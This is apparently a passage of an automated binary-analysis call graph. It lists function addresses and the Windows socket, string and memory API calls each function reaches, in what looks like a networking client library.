7ff7e5a11357 48120->48122 48126 7ff7e5a11436 48120->48126 48123 7ff7e59ffb70 304 API calls 48121->48123 48121->48126 48124 7ff7e5a08e80 13 API calls 48122->48124 48123->48126 48125 7ff7e5a113c8 calloc 48124->48125 48127 7ff7e5a113e7 48125->48127 48128 7ff7e5a113e0 48125->48128 48126->48118 48173 7ff7e5a11960 48127->48173 48128->48126 48130 7ff7e5a113f6 48130->48126 48183 7ff7e5a11710 48130->48183 48133->48112 48135 7ff7e59f6d3c 48134->48135 48160 7ff7e59f6e12 48134->48160 48233 7ff7e59faf50 48135->48233 48137 7ff7e59f6d47 free free 48141 7ff7e59f6d77 48137->48141 48138 7ff7e5a3f580 8 API calls 48139 7ff7e59f6e47 48138->48139 48139->48112 48140 7ff7e59f6db5 48251 7ff7e59f84a0 48140->48251 48141->48140 48261 7ff7e5a14cc0 22 API calls 48141->48261 48144 7ff7e59f6e7c 48255 7ff7e5a0e520 48144->48255 48145 7ff7e59f6dcf 48145->48144 48145->48160 48262 7ff7e5a0eee0 free free free free 48145->48262 48149 7ff7e59f6eab 48150 7ff7e59f6eb0 free 48149->48150 48150->48150 48151 7ff7e59f6ece 48150->48151 48152 7ff7e59f6ffb 48151->48152 48153 7ff7e59f6f37 48151->48153 48266 7ff7e5a01430 90 API calls 48152->48266 48154 7ff7e5a08e80 13 API calls 48153->48154 48156 7ff7e59f6f96 48154->48156 48263 7ff7e59fe740 92 API calls 48156->48263 48157 7ff7e59f702d 48267 7ff7e5a015b0 292 API calls 48157->48267 48160->48138 48161 7ff7e59f6fb7 48162 7ff7e59f6fe5 48161->48162 48163 7ff7e59f6fbb 48161->48163 48265 7ff7e5a015b0 292 API calls 48162->48265 48164 7ff7e5a05af0 15 API calls 48163->48164 48166 7ff7e59f6fd6 48164->48166 48264 7ff7e5a015b0 292 API calls 48166->48264 48168->48112 48169->48112 48170->48112 48171->48112 48172->48105 48203 7ff7e5a08ef0 15 API calls 48173->48203 48175 7ff7e5a11989 48176 7ff7e5a119ca 48175->48176 48177 7ff7e5a11991 48175->48177 48178 7ff7e5a119d7 free free 48176->48178 48179 7ff7e5a119e9 48176->48179 48204 7ff7e5a115a0 7 API calls 48177->48204 48178->48179 48179->48130 48182 7ff7e5a119b5 free 48182->48130 48184 7ff7e5a11772 48183->48184 48185 7ff7e5a117da 48184->48185 48186 7ff7e5a11784 48184->48186 48206 7ff7e5a061c0 48185->48206 48205 7ff7e5a0c080 malloc 48186->48205 48188 7ff7e5a11799 48191 7ff7e5a117bf memcpy 48188->48191 48192 7ff7e5a117a0 48188->48192 48191->48185 48193 7ff7e5a117b7 48192->48193 48194 7ff7e5a117a5 free free 48192->48194 48202 7ff7e5a11418 48193->48202 48194->48193 48195 7ff7e5a11929 free free 48195->48202 48196 7ff7e5a1183c 48209 7ff7e5a058b0 fwrite fwrite 48196->48209 48197 7ff7e5a1186e 48197->48195 48197->48202 48199 7ff7e5a1184d 48200 7ff7e5a11866 48199->48200 48210 7ff7e5a058b0 fwrite fwrite 48199->48210 48200->48197 48202->48121 48202->48126 48203->48175 48204->48182 48205->48188 48211 7ff7e5a1bc90 48206->48211 48209->48199 48210->48200 48212 7ff7e5a1bd09 malloc 48211->48212 48214 7ff7e5a1bce2 48211->48214 48213 7ff7e5a1bd49 48212->48213 48215 7ff7e5a1bcfc 48212->48215 48216 7ff7e5a1bd69 memcpy 48213->48216 48214->48212 48214->48215 48217 7ff7e5a3f580 8 API calls 48215->48217 48226 7ff7e5a1bdec 48216->48226 48218 7ff7e5a061f0 48217->48218 48218->48196 48218->48197 48219 7ff7e5a1bef9 free 48219->48215 48220 7ff7e5a071f0 10 API calls 48220->48226 48221 7ff7e5a1bec1 48232 7ff7e5a05970 19 API calls 48221->48232 48223 7ff7e5a15fe0 19 API calls 48223->48226 48224 7ff7e5a1bed3 48224->48219 48225 7ff7e5a1be9b WSAGetLastError 48231 7ff7e5a05970 19 API calls 48225->48231 48226->48219 48226->48220 48226->48221 48226->48223 48226->48225 48228 7ff7e5a06230 48 API calls 48226->48228 48230 7ff7e5a1be8d 48226->48230 48228->48226 48229 7ff7e5a1beb3 48229->48230 48230->48219 48231->48229 48232->48224 48234 7ff7e59faf65 48233->48234 48235 7ff7e59faf77 48233->48235 48234->48235 48236 7ff7e59faf6b 48234->48236 48238 7ff7e59fb114 free 48235->48238 48239 7ff7e59fb088 EnterCriticalSection LeaveCriticalSection 48235->48239 48268 7ff7e5a18da0 WaitForSingleObjectEx CloseHandle 48236->48268 48238->48137 48241 7ff7e59fb0c1 CloseHandle 48239->48241 48242 7ff7e59fb0cb 48239->48242 48240 7ff7e59faf70 48240->48235 48245 7ff7e59fb0ec 48241->48245 48243 7ff7e59fb0d1 48242->48243 48244 7ff7e59fb0d9 48242->48244 48269 7ff7e5a18da0 WaitForSingleObjectEx CloseHandle 48243->48269 48270 7ff7e59fb130 7 API calls 48244->48270 48248 7ff7e59fb101 closesocket 48245->48248 48271 7ff7e59f5b00 free 48245->48271 48248->48238 48249 7ff7e59fb0e2 free 48249->48245 48252 7ff7e59f84f0 48251->48252 48253 7ff7e59f84b7 48251->48253 48252->48145 48272 7ff7e59f57f0 17 API calls 48253->48272 48256 7ff7e5a0e59a 48255->48256 48260 7ff7e5a0e541 48255->48260 48257 7ff7e5a3f580 8 API calls 48256->48257 48259 7ff7e59f6e8b free 48257->48259 48258 7ff7e5a0e563 _time64 48258->48256 48259->48149 48259->48151 48260->48256 48260->48258 48261->48140 48262->48144 48263->48161 48266->48157 48268->48240 48269->48244 48270->48249 48271->48248 48272->48252 48273 7ff7e59f743c 48274 7ff7e5a15090 2 API calls 48273->48274 48275 7ff7e59f7449 48274->48275 48276 7ff7e59f7465 48275->48276 48331 7ff7e59f57f0 17 API calls 48275->48331 48278 7ff7e59f7481 48276->48278 48332 7ff7e59f57f0 17 API calls 48276->48332 48300 7ff7e5a01190 free free 48278->48300 48281 7ff7e59f7491 48282 7ff7e5a05af0 15 API calls 48281->48282 48285 7ff7e59f74e7 48281->48285 48298 7ff7e59f727b 48281->48298 48283 7ff7e59f74db 48282->48283 48284 7ff7e59f84a0 17 API calls 48283->48284 48284->48285 48285->48298 48333 7ff7e5a0b580 free 48285->48333 48286 7ff7e59f84a0 17 API calls 48286->48298 48289 7ff7e59f8322 48290 7ff7e59f8313 48337 7ff7e5a05970 19 API calls 48290->48337 48294 7ff7e5a071f0 10 API calls 48294->48298 48295 7ff7e59f731e 48296 7ff7e5a05970 19 API calls 48295->48296 48295->48298 48296->48295 48298->48286 48298->48289 48298->48290 48298->48294 48298->48295 48299 7ff7e59f6d00 292 API calls 48298->48299 48330 7ff7e5a05970 19 API calls 48298->48330 48334 7ff7e5a01430 90 API calls 48298->48334 48335 7ff7e59f5a20 15 API calls 48298->48335 48336 7ff7e5a151e0 22 API calls 48298->48336 48299->48298 48338 7ff7e5a00f70 48300->48338 48303 7ff7e5a00f70 292 API calls 48304 7ff7e5a011f6 memset 48303->48304 48371 7ff7e5a02920 48304->48371 48306 7ff7e5a012be 48310 7ff7e5a0123d 48306->48310 48462 7ff7e5a01430 90 API calls 48306->48462 48308 7ff7e5a15090 2 API calls 48311 7ff7e5a0125f 48308->48311 48310->48281 48311->48310 48312 7ff7e5a012b2 48311->48312 48313 7ff7e5a0128b free 48311->48313 48312->48306 48314 7ff7e5a0d7b0 2 API calls 48312->48314 48461 7ff7e5a08db0 15 API calls 48313->48461 48316 7ff7e5a01300 48314->48316 48317 7ff7e5a01314 48316->48317 48318 7ff7e5a0133d 48316->48318 48463 7ff7e5a06780 48317->48463 48320 7ff7e5a15090 2 API calls 48318->48320 48322 7ff7e5a0134a 48320->48322 48325 7ff7e5a0136d 48322->48325 48326 7ff7e5a15090 2 API calls 48322->48326 48323 7ff7e5a013f7 48324 7ff7e5a0d7b0 2 API calls 48323->48324 48324->48310 48327 7ff7e5a07300 47 API calls 48325->48327 48326->48325 48328 7ff7e5a01387 48327->48328 48328->48323 48329 7ff7e5a05af0 15 API calls 48328->48329 48329->48323 48330->48298 48331->48276 48332->48278 48333->48298 48334->48298 48335->48298 48336->48298 48337->48289 48339 7ff7e5a00f7f 48338->48339 48340 7ff7e5a0117b 48338->48340 48339->48340 48474 7ff7e59f5a20 15 API calls 48339->48474 48340->48303 48342 7ff7e5a00f9d 48343 7ff7e5a00fb1 48342->48343 48475 7ff7e59f6930 292 API calls 48342->48475 48345 7ff7e5a00fc2 48343->48345 48476 7ff7e59f6620 292 API calls 48343->48476 48347 7ff7e5a00fe6 free 48345->48347 48348 7ff7e5a00ff3 48345->48348 48347->48348 48477 7ff7e5a015b0 292 API calls 48348->48477 48372 7ff7e5a02965 48371->48372 48460 7ff7e5a02989 48372->48460 48478 7ff7e5a02120 calloc 48372->48478 48374 7ff7e5a3f580 8 API calls 48376 7ff7e5a01225 48374->48376 48375 7ff7e5a0299b 48375->48460 48493 7ff7e5a04590 48375->48493 48376->48306 48376->48308 48376->48310 48379 7ff7e5a029e4 48381 7ff7e5a029f0 _strdup 48379->48381 48382 7ff7e5a02a02 48379->48382 48380 7ff7e5a029d2 _strdup 48380->48379 48380->48460 48381->48382 48381->48460 48543 7ff7e5a03330 48382->48543 48386 7ff7e5a08e80 13 API calls 48388 7ff7e5a02a75 48386->48388 48387 7ff7e5a02ac7 48389 7ff7e5a02b22 48387->48389 48390 7ff7e5a02b0c _strdup 48387->48390 48387->48460 48388->48460 48602 7ff7e5a03b80 48388->48602 48391 7ff7e5a02b45 48389->48391 48392 7ff7e5a02b2c _strdup 48389->48392 48390->48389 48390->48460 48618 7ff7e5a03ff0 48391->48618 48392->48391 48392->48460 48397 7ff7e5a02b92 48399 7ff7e5a02bb4 48397->48399 48400 7ff7e5a016c0 38 API calls 48397->48400 48397->48460 48398 7ff7e5a016c0 38 API calls 48398->48397 48401 7ff7e5a016c0 38 API calls 48399->48401 48402 7ff7e5a02bd6 48399->48402 48399->48460 48400->48399 48401->48402 48403 7ff7e5a02d6f 48402->48403 48406 7ff7e5a02cd4 48402->48406 48402->48460 48640 7ff7e59feea0 48403->48640 48405 7ff7e5a02f0a 48407 7ff7e59feea0 8 API calls 48405->48407 48405->48460 48409 7ff7e5a02cf4 48406->48409 48410 7ff7e5a02d5f 48406->48410 48408 7ff7e5a02f21 48407->48408 48408->48460 48664 7ff7e5a04a50 48408->48664 48721 7ff7e59fdde0 17 API calls 48409->48721 48411 7ff7e5a01790 2 API calls 48410->48411 48411->48460 48414 7ff7e5a02d0a 48416 7ff7e5a054c0 17 API calls 48414->48416 48414->48460 48422 7ff7e5a02d1c 48416->48422 48417 7ff7e5a03014 48421 7ff7e5a030c1 48417->48421 48725 7ff7e59fe380 13 API calls 48417->48725 48418 7ff7e5a02d22 48418->48460 48420 7ff7e5a02f79 48420->48417 48423 7ff7e5a02f81 48420->48423 48424 7ff7e5a05af0 15 API calls 48421->48424 48422->48418 48722 7ff7e5a0c9a0 17 API calls 48422->48722 48724 7ff7e5a05170 34 API calls 48423->48724 48428 7ff7e5a030d0 48424->48428 48728 7ff7e5a025b0 44 API calls 48428->48728 48429 7ff7e5a02f91 free free 48431 7ff7e5a02fb8 48429->48431 48434 7ff7e5a05af0 15 API calls 48431->48434 48432 7ff7e5a03066 48439 7ff7e5a030ab 48432->48439 48726 7ff7e59fe130 QueryPerformanceCounter GetTickCount 48432->48726 48437 7ff7e5a0300f 48434->48437 48435 7ff7e5a0314c 48731 7ff7e59fdde0 17 API calls 48435->48731 48436 7ff7e5a0308d 48442 7ff7e5a030a0 48436->48442 48443 7ff7e5a030ad 48436->48443 48684 7ff7e5a01790 48437->48684 48439->48435 48729 7ff7e59fe200 QueryPerformanceCounter GetTickCount 48439->48729 48441 7ff7e5a03181 48441->48437 48456 7ff7e5a05af0 15 API calls 48441->48456 48727 7ff7e5a01430 90 API calls 48442->48727 48448 7ff7e5a05af0 15 API calls 48443->48448 48445 7ff7e5a031cb 48688 7ff7e5a054c0 48445->48688 48446 7ff7e5a0315b 48446->48441 48451 7ff7e5a05af0 15 API calls 48446->48451 48446->48460 48448->48421 48449 7ff7e5a03135 48452 7ff7e5a03141 48449->48452 48453 7ff7e5a0331b 48449->48453 48451->48441 48730 7ff7e5a01430 90 API calls 48452->48730 48455 7ff7e5a05af0 15 API calls 48453->48455 48454 7ff7e5a031d3 48454->48460 48697 7ff7e5a04ef0 48454->48697 48455->48421 48459 7ff7e5a031af 48456->48459 48459->48437 48460->48374 48461->48312 48462->48310 48464 7ff7e5a0d7b0 2 API calls 48463->48464 48465 7ff7e5a067a3 48464->48465 48466 7ff7e5a0681b 48465->48466 48473 7ff7e5a06834 48465->48473 48850 7ff7e5a05970 19 API calls 48466->48850 48468 7ff7e5a0682a 48469 7ff7e5a0132a 48468->48469 48469->48306 48469->48323 48470 7ff7e5a0693d 48470->48469 48851 7ff7e59f57f0 17 API calls 48470->48851 48473->48470 48785 7ff7e5a07cc0 48473->48785 48474->48342 48475->48343 48476->48345 48479 7ff7e5a02145 48478->48479 48480 7ff7e5a02150 calloc 48478->48480 48479->48375 48481 7ff7e5a023c1 free 48480->48481 48482 7ff7e5a0217a 48480->48482 48481->48375 48483 7ff7e5a0d7b0 2 API calls 48482->48483 48484 7ff7e5a02211 48483->48484 48485 7ff7e5a0d7b0 2 API calls 48484->48485 48486 7ff7e5a02225 48485->48486 48487 7ff7e5a023fd 48486->48487 48488 7ff7e5a02387 _strdup 48486->48488 48490 7ff7e5a0d7b0 2 API calls 48487->48490 48488->48487 48489 7ff7e5a02399 48488->48489 48492 7ff7e5a023a7 free free 48489->48492 48491 7ff7e5a0243d 48490->48491 48491->48375 48492->48481 48732 7ff7e5a05570 8 API calls 48493->48732 48496 7ff7e5a045b0 48735 7ff7e5a2e540 23 API calls 48496->48735 48497 7ff7e5a045b7 48736 7ff7e5a2e500 calloc 48497->48736 48500 7ff7e5a045b5 48501 7ff7e5a045bc 48500->48501 48502 7ff7e5a04632 48501->48502 48513 7ff7e5a029bc 48501->48513 48737 7ff7e5a2e170 tolower 48501->48737 48502->48513 48515 7ff7e5a046f5 48502->48515 48739 7ff7e5a2e680 8 API calls 48502->48739 48505 7ff7e5a045ff 48505->48502 48506 7ff7e5a0460b free 48505->48506 48507 7ff7e5a04618 48505->48507 48506->48507 48738 7ff7e5a08db0 15 API calls 48507->48738 48508 7ff7e5a0475c 48741 7ff7e5a05970 19 API calls 48508->48741 48512 7ff7e5a046dc 48512->48513 48512->48515 48516 7ff7e5a046e8 free 48512->48516 48513->48379 48513->48380 48513->48460 48514 7ff7e5a0476e 48514->48513 48740 7ff7e5a2e680 8 API calls 48515->48740 48516->48515 48517 7ff7e5a0471e 48517->48508 48517->48513 48518 7ff7e5a04794 48517->48518 48742 7ff7e5a2e680 8 API calls 48518->48742 48520 7ff7e5a047bb 48521 7ff7e5a047c5 _strdup 48520->48521 48522 7ff7e5a047e2 48520->48522 48521->48513 48521->48522 48522->48513 48743 7ff7e5a2e680 8 API calls 48522->48743 48524 7ff7e5a04805 48525 7ff7e5a04828 48524->48525 48526 7ff7e5a0480f _strdup 48524->48526 48525->48513 48744 7ff7e5a2e680 8 API calls 48525->48744 48526->48513 48526->48525 48528 7ff7e5a04848 48529 7ff7e5a04852 _strdup 48528->48529 48530 7ff7e5a048dd 48528->48530 48529->48513 48529->48530 48530->48513 48745 7ff7e5a2e680 8 API calls 48530->48745 48532 7ff7e5a048f8 48532->48513 48746 7ff7e5a2e680 8 API calls 48532->48746 48534 7ff7e5a0492d 48534->48513 48747 7ff7e5a2e680 8 API calls 48534->48747 48536 7ff7e5a04971 48537 7ff7e5a04991 strtoul 48536->48537 48538 7ff7e5a04975 48536->48538 48537->48538 48538->48513 48748 7ff7e5a2e680 8 API calls 48538->48748 48540 7ff7e5a04a0d _strdup 48540->48513 48541 7ff7e5a049d0 48541->48540 48541->48541 48749 7ff7e5a05640 20 API calls 48541->48749 48544 7ff7e5a0344d 48543->48544 48545 7ff7e5a0337d memset memset 48543->48545 48546 7ff7e5a03480 48544->48546 48547 7ff7e5a03459 _strdup 48544->48547 48548 7ff7e5a033b0 strncpy 48545->48548 48549 7ff7e5a033c8 48545->48549 48551 7ff7e5a0349f 48546->48551 48552 7ff7e5a0348c _strdup 48546->48552 48547->48546 48550 7ff7e5a03467 48547->48550 48548->48549 48553 7ff7e5a033d4 strncpy 48549->48553 48554 7ff7e5a033ef 48549->48554 48758 7ff7e5a05970 19 API calls 48550->48758 48581 7ff7e5a034fe 48551->48581 48759 7ff7e5a1bf40 realloc GetEnvironmentVariableA realloc free 48551->48759 48552->48550 48552->48551 48553->48554 48756 7ff7e5a1c080 malloc strtoul free 48554->48756 48557 7ff7e5a03476 48561 7ff7e5a039a7 free free 48557->48561 48559 7ff7e5a0340f 48560 7ff7e5a0343c 48559->48560 48757 7ff7e5a1c080 malloc strtoul free 48559->48757 48560->48544 48560->48561 48566 7ff7e5a3f580 8 API calls 48561->48566 48562 7ff7e5a034c0 48563 7ff7e5a034dc 48562->48563 48760 7ff7e5a1bf40 realloc GetEnvironmentVariableA realloc free 48562->48760 48568 7ff7e5a05af0 15 API calls 48563->48568 48563->48581 48565 7ff7e5a03761 free 48570 7ff7e5a03771 48565->48570 48571 7ff7e5a0379e 48565->48571 48569 7ff7e5a02a17 48566->48569 48568->48581 48569->48386 48569->48388 48569->48460 48570->48571 48576 7ff7e5a03792 free 48570->48576 48572 7ff7e5a037c8 48571->48572 48577 7ff7e5a037b8 free 48571->48577 48578 7ff7e5a037cd 48572->48578 48765 7ff7e5a04240 47 API calls 48572->48765 48573 7ff7e5a036a9 48761 7ff7e5a1bf40 realloc GetEnvironmentVariableA realloc free 48573->48761 48574 7ff7e5a03656 48574->48565 48574->48573 48579 7ff7e5a03690 tolower 48574->48579 48575 7ff7e5a037e4 free free free 48588 7ff7e5a037d7 48575->48588 48576->48571 48577->48572 48578->48588 48599 7ff7e5a03881 48578->48599 48766 7ff7e5a04240 47 API calls 48578->48766 48579->48573 48579->48579 48581->48574 48581->48575 48581->48581 48585 7ff7e5a0356e strchr 48581->48585 48601 7ff7e5a03587 48581->48601 48583 7ff7e5a0370c 48589 7ff7e5a0373f 48583->48589 48763 7ff7e5a1bf40 realloc GetEnvironmentVariableA realloc free 48583->48763 48584 7ff7e5a0382f free 48584->48578 48584->48588 48585->48574 48585->48601 48587 7ff7e5a03863 free 48587->48588 48587->48599 48588->48561 48591 7ff7e5a05af0 15 API calls 48589->48591 48593 7ff7e5a0375c 48589->48593 48591->48593 48592 7ff7e5a03728 48592->48589 48764 7ff7e5a1bf40 realloc GetEnvironmentVariableA realloc free 48592->48764 48593->48565 48594 7ff7e5a036d0 48594->48583 48762 7ff7e5a1bf40 realloc GetEnvironmentVariableA realloc free 48594->48762 48595 7ff7e5a035b0 strchr 48595->48601 48598 7ff7e5a035e0 strchr 48598->48601 48599->48588 48600 7ff7e5a038f7 free 48599->48600 48600->48588 48601->48574 48601->48575 48601->48595 48601->48598 48603 7ff7e5a03bb1 48602->48603 48611 7ff7e5a03be4 48602->48611 48608 7ff7e5a03bc4 free 48603->48608 48609 7ff7e5a03bd0 48603->48609 48603->48611 48604 7ff7e5a03c1b 48606 7ff7e5a03c2f free _strdup 48604->48606 48607 7ff7e5a03c51 48604->48607 48605 7ff7e5a03bf9 free _strdup 48605->48604 48617 7ff7e5a03d18 48605->48617 48606->48607 48606->48617 48610 7ff7e5a03c65 free _strdup 48607->48610 48613 7ff7e5a03c8f 48607->48613 48608->48609 48609->48611 48612 7ff7e5a03bd8 free 48609->48612 48610->48613 48610->48617 48611->48604 48611->48605 48612->48611 48613->48617 48767 7ff7e5a30430 36 API calls 48613->48767 48615 7ff7e5a03cfe 48616 7ff7e5a05af0 15 API calls 48615->48616 48615->48617 48616->48617 48617->48387 48625 7ff7e5a04020 48618->48625 48620 7ff7e5a040f8 strchr 48622 7ff7e5a0410d strtol 48620->48622 48620->48625 48621 7ff7e5a02b57 48621->48460 48628 7ff7e5a016c0 48621->48628 48622->48625 48624 7ff7e5a0419a free 48624->48625 48625->48620 48625->48621 48625->48624 48626 7ff7e5a05af0 15 API calls 48625->48626 48627 7ff7e5a040c7 free 48625->48627 48768 7ff7e5a08db0 15 API calls 48625->48768 48769 7ff7e5a03df0 22 API calls 48625->48769 48626->48625 48627->48624 48627->48625 48629 7ff7e5a016f5 48628->48629 48634 7ff7e5a0170f 48628->48634 48629->48634 48770 7ff7e5a30380 18 API calls 48629->48770 48630 7ff7e5a3f580 8 API calls 48631 7ff7e5a01721 48630->48631 48631->48397 48631->48398 48631->48460 48633 7ff7e5a01748 48633->48634 48635 7ff7e5a0175b GetLastError 48633->48635 48634->48630 48771 7ff7e59f2640 21 API calls 48635->48771 48637 7ff7e5a01773 48772 7ff7e5a05970 19 API calls 48637->48772 48639 7ff7e5a01789 48639->48634 48641 7ff7e59feee6 _strdup 48640->48641 48642 7ff7e59fef05 48640->48642 48641->48642 48643 7ff7e59feef5 48641->48643 48644 7ff7e59fef12 _strdup 48642->48644 48645 7ff7e59fef31 48642->48645 48643->48405 48644->48645 48646 7ff7e59fef21 48644->48646 48647 7ff7e59fef3e _strdup 48645->48647 48648 7ff7e59fef5d 48645->48648 48646->48405 48647->48648 48649 7ff7e59fef4d 48647->48649 48650 7ff7e59fef6a _strdup 48648->48650 48651 7ff7e59fef89 48648->48651 48649->48405 48650->48651 48652 7ff7e59fef79 48650->48652 48653 7ff7e59fef96 _strdup 48651->48653 48654 7ff7e59fefb5 48651->48654 48652->48405 48653->48654 48655 7ff7e59fefa5 48653->48655 48656 7ff7e59fefc2 _strdup 48654->48656 48657 7ff7e59fefe1 48654->48657 48655->48405 48656->48657 48658 7ff7e59fefd1 48656->48658 48659 7ff7e59fefee _strdup 48657->48659 48660 7ff7e59ff00d 48657->48660 48658->48405 48659->48660 48661 7ff7e59feffd 48659->48661 48662 7ff7e59ff01a _strdup 48660->48662 48663 7ff7e59ff029 48660->48663 48661->48405 48662->48663 48663->48405 48665 7ff7e5a0d7b0 2 API calls 48664->48665 48666 7ff7e5a04a63 48665->48666 48667 7ff7e5a0e520 9 API calls 48666->48667 48669 7ff7e5a02f37 48666->48669 48674 7ff7e5a04b37 48666->48674 48773 7ff7e5a0eee0 free free free free 48666->48773 48774 7ff7e5a30d10 8 API calls 48666->48774 48775 7ff7e5a30920 7 API calls 48666->48775 48667->48666 48669->48417 48723 7ff7e5a00600 15 API calls 48669->48723 48672 7ff7e5a05af0 15 API calls 48672->48674 48674->48672 48675 7ff7e5a065d0 closesocket free 48674->48675 48676 7ff7e5a04bd6 30 API calls 48674->48676 48776 7ff7e59fac00 16 API calls 48674->48776 48675->48674 48777 7ff7e5a028a0 free free 48676->48777 48678 7ff7e5a04e36 48679 7ff7e5a04e44 free 48678->48679 48778 7ff7e59ff050 8 API calls 48679->48778 48681 7ff7e5a04e64 48779 7ff7e59ff050 8 API calls 48681->48779 48683 7ff7e5a04e70 free free free 48683->48666 48685 7ff7e5a0179e 48684->48685 48686 7ff7e5a0d7b0 2 API calls 48685->48686 48687 7ff7e5a01808 48686->48687 48687->48445 48689 7ff7e5a054dc 48688->48689 48690 7ff7e5a054e5 48689->48690 48691 7ff7e5a05512 48689->48691 48692 7ff7e5a054fe free 48689->48692 48690->48454 48693 7ff7e5a05525 _strdup 48691->48693 48694 7ff7e5a05517 48691->48694 48692->48691 48696 7ff7e5a05523 48693->48696 48780 7ff7e5a08db0 15 API calls 48694->48780 48696->48454 48698 7ff7e5a071f0 10 API calls 48697->48698 48699 7ff7e5a04f15 48698->48699 48700 7ff7e5a04fdc 48699->48700 48701 7ff7e5a04f37 calloc 48699->48701 48713 7ff7e5a04f20 48699->48713 48702 7ff7e5a0509d _strdup 48700->48702 48703 7ff7e5a04fe8 _strdup 48700->48703 48704 7ff7e5a04f4f 48701->48704 48705 7ff7e5a04f57 48701->48705 48706 7ff7e5a050ca 48702->48706 48712 7ff7e5a050e0 48702->48712 48703->48706 48717 7ff7e5a05035 48703->48717 48704->48713 48781 7ff7e5a18b90 6 API calls 48705->48781 48706->48460 48712->48713 48713->48460 48717->48713 48721->48414 48722->48410 48723->48420 48724->48429 48725->48432 48726->48436 48727->48439 48728->48460 48729->48449 48730->48435 48731->48446 48750 7ff7e5a2e510 48732->48750 48735->48500 48737->48505 48738->48502 48739->48512 48740->48517 48741->48514 48742->48520 48743->48524 48744->48528 48745->48532 48746->48534 48747->48536 48748->48541 48749->48540 48751 7ff7e5a045a4 48750->48751 48752 7ff7e5a2e515 48750->48752 48751->48496 48751->48497 48755 7ff7e5a2f4f0 12 API calls 48752->48755 48756->48559 48757->48560 48758->48557 48759->48562 48760->48563 48761->48594 48762->48583 48763->48592 48764->48589 48765->48584 48766->48587 48767->48615 48768->48625 48769->48625 48770->48633 48771->48637 48772->48639 48773->48666 48776->48674 48777->48678 48778->48681 48779->48683 48780->48696 48786 7ff7e5a07d2f memcpy 48785->48786 48788 7ff7e5a07d98 socket 48786->48788 48790 7ff7e5a07d6b 48786->48790 48788->48790 48789 7ff7e5a3f580 8 API calls 48792 7ff7e5a0826b 48789->48792 48793 7ff7e5a07dd7 48790->48793 48843 7ff7e5a080f4 48790->48843 48872 7ff7e5a14c90 ioctlsocket 48790->48872 48792->48473 48794 7ff7e5a081fa _errno _errno _errno 48793->48794 48852 7ff7e5a311c0 48793->48852 48877 7ff7e59f2500 27 API calls 48794->48877 48797 7ff7e5a07e24 48797->48794 48799 7ff7e5a07e2d htons 48797->48799 48798 7ff7e5a0822b 48878 7ff7e5a05970 19 API calls 48798->48878 48801 7ff7e5a05af0 15 API calls 48799->48801 48803 7ff7e5a07e4e 48801->48803 48802 7ff7e5a08240 48804 7ff7e5a065d0 2 API calls 48802->48804 48806 7ff7e5a07ec9 48803->48806 48807 7ff7e5a07e6f setsockopt 48803->48807 48805 7ff7e5a080d5 48804->48805 48805->48843 48809 7ff7e5a08800 14 API calls 48806->48809 48813 7ff7e5a07f01 48806->48813 48807->48806 48808 7ff7e5a07e9d WSAGetLastError 48807->48808 48873 7ff7e59f2500 27 API calls 48808->48873 48809->48813 48810 7ff7e5a07f05 48818 7ff7e5a07f8a setsockopt 48810->48818 48823 7ff7e5a07fc9 48810->48823 48811 7ff7e5a07f22 getsockopt 48814 7ff7e5a07f53 setsockopt 48811->48814 48815 7ff7e5a07f49 48811->48815 48813->48810 48813->48811 48814->48810 48815->48810 48815->48814 48816 7ff7e5a07eb7 48819 7ff7e5a05af0 15 API calls 48816->48819 48817 7ff7e5a08097 48820 7ff7e5a080a8 48817->48820 48822 7ff7e5a080fe 48817->48822 48821 7ff7e5a07fb7 48818->48821 48827 7ff7e5a07fce 48818->48827 48819->48806 48874 7ff7e5a07630 645 API calls 48820->48874 48824 7ff7e5a05af0 15 API calls 48821->48824 48871 7ff7e5a14c90 ioctlsocket 48822->48871 48823->48817 48839 7ff7e5a080e9 48823->48839 48824->48823 48826 7ff7e5a0810b 48829 7ff7e5a0d7b0 2 API calls 48826->48829 48830 7ff7e5a07ffc WSAIoctl 48827->48830 48832 7ff7e5a08115 48829->48832 48830->48823 48833 7ff7e5a08044 WSAGetLastError 48830->48833 48831 7ff7e5a080c4 48831->48822 48834 7ff7e5a080ca 48831->48834 48835 7ff7e5a0813f 48832->48835 48875 7ff7e59f57f0 17 API calls 48832->48875 48836 7ff7e5a05af0 15 API calls 48833->48836 48837 7ff7e5a065d0 2 API calls 48834->48837 48841 7ff7e5a08188 WSAGetLastError 48835->48841 48842 7ff7e5a0815f connect 48835->48842 48835->48843 48836->48823 48837->48805 48840 7ff7e5a065d0 2 API calls 48839->48840 48840->48843 48841->48843 48844 7ff7e5a08195 48841->48844 48842->48841 48842->48843 48843->48789 48844->48843 48876 7ff7e59f2500 27 API calls 48844->48876 48846 7ff7e5a081b1 48847 7ff7e5a05af0 15 API calls 48846->48847 48848 7ff7e5a081c7 48847->48848 48849 7ff7e5a065d0 2 API calls 48848->48849 48849->48843 48850->48468 48851->48469 48853 7ff7e5a311f9 48852->48853 48854 7ff7e5a311cf 48852->48854 48856 7ff7e5a08e80 13 API calls 48853->48856 48855 7ff7e5a311d4 _errno 48854->48855 48862 7ff7e5a311e7 48854->48862 48855->48797 48857 7ff7e5a31268 48856->48857 48858 7ff7e5a312b4 _errno 48857->48858 48859 7ff7e5a31287 48857->48859 48858->48859 48860 7ff7e5a3f580 8 API calls 48859->48860 48861 7ff7e5a312cf 48860->48861 48861->48797 48863 7ff7e5a08e80 13 API calls 48862->48863 48864 7ff7e5a3155a 48862->48864 48866 7ff7e5a314e0 48862->48866 48863->48862 48879 7ff7e5a31210 14 API calls 48864->48879 48867 7ff7e5a31509 48866->48867 48868 7ff7e5a31573 _errno 48866->48868 48869 7ff7e5a3f580 8 API calls 48867->48869 48868->48867 48870 7ff7e5a31547 48869->48870 48870->48797 48871->48826 48872->48793 48873->48816 48874->48831 48875->48835 48876->48846 48877->48798 48878->48802 48879->48866 48880 7ff7e59f7df8 48881 7ff7e59f7e11 48880->48881 48882 7ff7e59f7e9f 48881->48882 48885 7ff7e59f8074 48881->48885 48921 7ff7e5a0c510 48882->48921 48965 7ff7e59f57f0 17 API calls 48885->48965 48888 7ff7e59f7ec4 48889 7ff7e59f7f60 48888->48889 48892 7ff7e59f7ece 48888->48892 48896 7ff7e59f7ef5 48888->48896 48890 7ff7e59f8011 48889->48890 48895 7ff7e59f7f68 48889->48895 48918 7ff7e59f727b 48890->48918 48964 7ff7e59f57f0 17 API calls 48890->48964 48891 7ff7e59f84a0 17 API calls 48891->48918 48897 7ff7e59f6d00 292 API calls 48892->48897 48895->48896 48898 7ff7e59f7f7e 48895->48898 48899 7ff7e59f7feb free 48895->48899 48900 7ff7e59f6d00 